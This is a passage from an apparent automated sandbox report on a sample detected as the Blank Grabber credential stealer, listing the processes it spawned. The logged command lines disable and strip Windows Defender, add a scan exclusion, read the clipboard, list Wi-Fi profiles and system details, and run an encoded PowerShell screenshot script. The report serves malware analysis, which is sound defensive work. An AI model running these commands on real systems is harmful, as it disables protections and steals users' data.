                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1739482392.000002290AE26000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1982906328.000002290B033000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1738014114.000002290AE01000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.1985975693.000002290ACD0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.1986903181.000002290AFF2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1984419770.000002290AFF0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1737962757.000002290ADC2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1982629773.000002290B711000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1983434642.000002290B038000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000003.1983989604.000002290AFCF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1985865273.000002290ABD0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:16:16:07
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:16:16:07
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:16:16:07
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:16:16:07
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:6
                                                            Start time:16:16:08
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:7
                                                            Start time:16:16:08
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\e45AiBoV6X.exe'
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:8
                                                            Start time:16:16:09
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:9
                                                            Start time:16:16:09
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:10
                                                            Start time:16:16:09
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:11
                                                            Start time:16:16:09
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:12
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tasklist.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:tasklist /FO LIST
                                                            Imagebase:0x7ff70fdd0000
                                                            File size:106'496 bytes
                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:13
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tasklist.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:tasklist /FO LIST
                                                            Imagebase:0x7ff70fdd0000
                                                            File size:106'496 bytes
                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:moderate
                                                            Has exited:true

                                                            Target ID:14
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:15
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:16
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:17
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:18
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:19
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:20
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:21
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:22
                                                            Start time:16:16:10
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff66dc00000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:23
                                                            Start time:16:16:11
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                                                            Imagebase:0x7ff7db190000
                                                            File size:576'000 bytes
                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:24
                                                            Start time:16:16:11
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell Get-Clipboard
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:25
                                                            Start time:16:16:11
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tasklist.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:tasklist /FO LIST
                                                            Imagebase:0x7ff70fdd0000
                                                            File size:106'496 bytes
                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:26
                                                            Start time:16:16:11
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:27
                                                            Start time:16:16:11
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:28
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\netsh.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:netsh wlan show profile
                                                            Imagebase:0x7ff7c5350000
                                                            File size:96'768 bytes
                                                            MD5 hash:6F1E6DD688818BC3D1391D0CC7D597EB
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:29
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:30
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "systeminfo"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:31
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand …"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:32
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:33
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:34
                                                            Start time:16:16:12
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:35
                                                            Start time:16:16:13
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff66dc00000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:36
                                                            Start time:16:16:13
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\systeminfo.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:systeminfo
                                                            Imagebase:0x7ff669fc0000
                                                            File size:110'080 bytes
                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:37
                                                            Start time:16:16:13
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAG
UAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:39
                                                            Start time:16:16:14
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:40
                                                            Start time:16:16:14
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:41
                                                            Start time:16:16:14
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\tree.com
                                                            Wow64 process (32bit):false
                                                            Commandline:tree /A /F
                                                            Imagebase:0x7ff66dc00000
                                                            File size:20'992 bytes
                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:42
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                            Imagebase:0x7ff7a8410000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Has exited:true

                                                            Target ID:43
                                                            Start time:16:16:15
                                                            Start date:20/07/2024
                                                            Path:C:\Windows\System32\conhost.exe
